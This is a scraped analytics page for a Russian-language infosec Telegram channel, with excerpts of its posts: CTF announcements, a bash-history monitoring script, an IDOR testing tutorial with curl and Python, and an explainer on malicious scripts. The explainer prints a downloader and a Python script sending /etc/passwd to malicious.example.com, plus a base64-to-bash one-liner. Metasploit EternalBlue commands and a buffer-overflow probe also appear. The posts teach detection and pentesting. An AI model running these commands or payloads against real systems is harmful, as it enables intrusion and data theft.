CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Показати більше📈 Аналітичний огляд Telegram-каналу CodeGuard: CyberSec Edition
Канал CodeGuard: CyberSec Edition є активним учасником. На даний момент спільнота об'єднує 12 634 підписників, посідаючи 10 058 місце в категорії Технології та додатки та 52 296 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 12 634 підписників.
За останніми даними від 22 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 614, а за останні 24 години на 96, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 12.48%. Протягом перших 24 годин після публікації контент зазвичай збирає 6.78% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 1 577 переглядів. Протягом першої доби публікація в середньому набирає 857 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 4.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як codeguard, pysec, docker, grep, контейнер.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Завдяки високій частоті оновлень (останні дані отримано 23 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}Ты помнишь, отправляя ответ на уровень EASY, ты не сможешь победить в других категориях(но сможешь поучаствовать) ⏳ Остальные уровни (MEDIUM и HARD) откроются сегодня в течении дня(всевышние силы помогите нам) — тогда же мы поделимся дополнительной информацией тут. 🚫 Важное: инструкцию доступна здесь 🏆 Призы ждут самых быстрых и ловких! Вопросы — в чат CodeGuard. Удачи, пентестеры! Вперед к победе! 😈 CodeGuard | #CTF_CodeGuard
Почему это важно? - Отслеживайте использование `sudo`, запуск удалённых подключений через `ssh` - Контролируйте загрузку файлов с помощью `wget`, `curl` - Находите нестандартные сетевые активности через `nc` или похожие команды⭐️ Как добавить время к истории команд? В файле
~/.bashrc добавьте:
export HISTTIMEFORMAT="%F %T "
Это позволит видеть точное время выполнения команд.
⭐️ Только пример простого скрипта для поиска подозрительных команд у всех пользователей:
#!/bin/bash
LOGFILE="/var/log/user_command_analysis.log"
PATTERNS="sudo|ssh|wget|curl|nc"
> $LOGFILE
for user_dir in /home/*; do
user=$(basename "$user_dir")
hist_file="$user_dir/.bash_history"
if [ -f "$hist_file" ]; then
echo "Анализ истории пользователя $user" >> "$LOGFILE"
grep -E "$PATTERNS" "$hist_file" >> "$LOGFILE"
echo "-------------------------" >> "$LOGFILE"
fi
done
echo "Анализ истории команд завершён. Результаты в $LOGFILE"
⭐️ Что дальше?
- Настроить скрипт на регулярный запуск в cron для мониторинга
- Добавить отправку отчёта на email
- Расширять список ключевых паттернов для поиска нужных событий
Такой подход даст быстрый и понятный контроль за действиями пользователей и повысит безопасность ваших систем.
Как тебе видос к посту?ставь реакцию)
❤️ - да пойдет, прикольное
👍 - да какая-то детская кринжатина, мы хакеры нам надо черный и нагнетающий видос!
😈 CodeGuard | #bash #sysadmin #bashscript #history #security🔥 Внимание! 📅 Даты проведения: 20.09 с 11:00 до 21.09 20:00 (МСК) Ребята, завтра в 11.00 стартует CTF от CodeGuard, ура!💀 Концепция соревнования Наш CTF - классический формат Jeopardy, разделенный на три уровня сложности: Легкий, Средний и Сложный. В каждой категории предстоит найти 3 флага: User, Admin и Root. Задачи охватывают направления: Веб, Криптография, Стеганография, Реверс-инжиниринг, Форензика и др. ➡️ Структура соревнования - Однопоточный формат — все категории доступны сразу. - Легкий уровень — задачи на базовые навыки. - Средний — требует более глубоких знаний. - Сложный — экспертиза в эксплойтинге и анализе.
Инструкция тут! Ознакомитесь заранее. p.s что бы не тратить время завтра в 11:00, а сразу начать выполнение и победить.🏆 Правила получения призов - Призы — книги, отдельно в каждой категории. (указал в инструкции, что конкретно) - Когда получите/найдете все три флага в одной из категории, отправьте в [CodeGuard@bk.ru] письмо.
Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}👀 Запрещено — подавать заявки в несколько категорий одновременно — DDos — ограничен перебор по количеству потоков 🎮 Посмотри инструкцию! Участвуйте, проверяйте свои навыки и побеждайте! Завтра в 11:00 пост и начало! Удачи всем! 😈 CodeGuard | #CTF_CodeGuard
Это позволяет: 1. Получать полный список снимков. Все даты и версии страниц, CSS, JS, изображений. 2. Фильтровать по времени. Изучать сайт в конкретный год, месяц или даже день. 3. Анализировать изменения. Сравнивать содержимое, заголовки, метатеги, скрипты между разными эпохами.✨ Читать дальше 😈 CodeGuard | #osint
PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.Спасибо, что вы здесь — вместе мы сильнее!
https://api.example.com/users/123где
123 — это ID пользователя.
Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:
curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"
Если нет токена, попробуй запросить без него — иногда API плохо проверяет права.
➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные?
Попробуй подставить другой ID пользователя:
curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"
Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference).
➡️Шаг 3. Что можно сделать, если уязвимость есть?
Можно читать чужие данные, а иногда — менять их. Например, изменить email:
curl -X PUT https://api.example.com/users/124 \
-H "Authorization: Bearer твой_токен" \
-H "Content-Type: application/json" \
-d '{"email":"hacker@example.com"}'
Если это сработало — значит API не проверяет права правильно, и это опасно.
➡️Шаг 4. Немного автоматизации с Python
Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:
import requests
url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}
for user_id in range(120, 130):
r = requests.get(url + str(user_id), headers=headers)
if r.status_code == 200:
print(f"Данные пользователя {user_id} доступны!")
Главное: Проверяй только то, что разрешено, иначе это незаконно.
😈 CodeGuard | #API #pentest #curl #python #vulnerabilityДобро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.➡️ Продолжение тут 😈 CodeGuard | #cybersecurity
📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальшеИзучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf
#!/bin/bash
# Скачиваем вредоносный файл и запускаем
curl -s http://malicious.example.com/malware.sh -o /tmp/malware.sh
chmod +x /tmp/malware.sh
/tmp/malware.sh &
-- Используется curl для загрузки файла с C&C сервера
— Запуск выполняется в фоне — скрытно для пользователя
— Вредоносный payload может быть любым — удалённое выполнение команд, майнинг, шпионаж
👩💻 2. Python-скрипт для сбора и отправки данных
Пример кода на Python, который читает локальный файл с паролями и отправляет на удалённый сервер:
import requests
def steal_data():
with open('/etc/passwd', 'r') as file:
data = file.read()
url = 'http://malicious.example.com/collect'
requests.post(url, data={'content': data})
if __name__ == "__main__":
steal_data()
- Используется модуль requests для HTTP-запроса
- Чтение системного файла /etc/passwd — могут быть и конфиги, и ключи
- Все данные отправляются на фишинговый или контролируемый сервер
🤔 3. Техники маскировки и обхода
- Скрипты часто запускаются из cron или через systemd для постоянства
- Логи и консольный вывод отключают или направляют в /dev/null
- Используются переменные среды и шифрование для сокрытия URL и команд
📖 4. Как анализировать такие скрипты
— Покомандно и построчно читать код — понимать что делает каждая строка
— Использовать bash -x script.sh или добавлять print() в Python для отладки
— Запускать в песочнице (VM) под контролем системы мониторинга
— Перехватывать сетевой трафик с помощью tcpdump или Wireshark
👩💻 5. Мини-скрипт для распаковки закодированных строк в Bash
Иногда payload шифруют base64:
echo "Y3VybCAtcyBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL21hbHdhcmUuc2g=" | base64 -d | bash
Для анализа достаточно выполнить декодировку:
echo "строка_в_base64" | base64 -d
👩💻 6. Пример Python скрипта для запуска шелл-команд и сбора вывода
import subprocess
cmd = "uname -a"
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
print(result.stdout.decode())
Эта техника часто используется для сбора информации о системе.
Простые на вид скрипты — это часто высокоэффективные инструменты атак. Важно уметь их читать, распаковывать и анализировать логику. Постоянная практика и инструменты помогут выявлять угрозы.
⭐️ CodeGuard | #malware #bash #python #pentest #reverseengineeringpip install -r requirements.txt
или
sudo apt-get install <пакет>
✅5. Запусти эксплоит с ключами отладки
Добавляй команды вывода для отслеживания:
- Для Bash: поставь set -x в начале скрипта
- Для Python добавь print() для важных переменных
- И запускай из терминала:
python3 exploit.py --target 192.168.0.10
✅6. Анализируй сетевой трафик
Во время запуска эксплоита захватывай трафик с помощью tcpdump или наблюдай через Wireshark:
sudo tcpdump -i eth0 -w exploit_traffic.pcap
wireshark exploit_traffic.pcap
✅7. Мини-пример на Python для теста уязвимости (Buffer Overflow)
import socket
target_ip = "192.168.0.10"
target_port = 9999
payload = b"A" * 1024 # заполняем буфер для взлома
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
print("Payload отправлен!")
s.close()
Этот скрипт посылает 1024 символа ‘A’ на указанный порт — простой тест на переполнение буфера или отслеживание реакции сервера.
✅ 8. Используй Exploit-DB и Metasploit
- Для поиска эксплоитов:
searchsploit <название_уязвимости>
- Запуск Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.10
run
⚠️ Важное: обязательно анализируй эксплоиты в изолированной и контрольной среде во избежание вреда. Эти навыки — основа в тестировании безопасности.
тебе еще весело? или слишком много надо понимать? желание быть хакером пропадает?)) а это только первые шаги...)
⭐️ CodeGuard | #pentest #exploit #bugbounty #cve
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
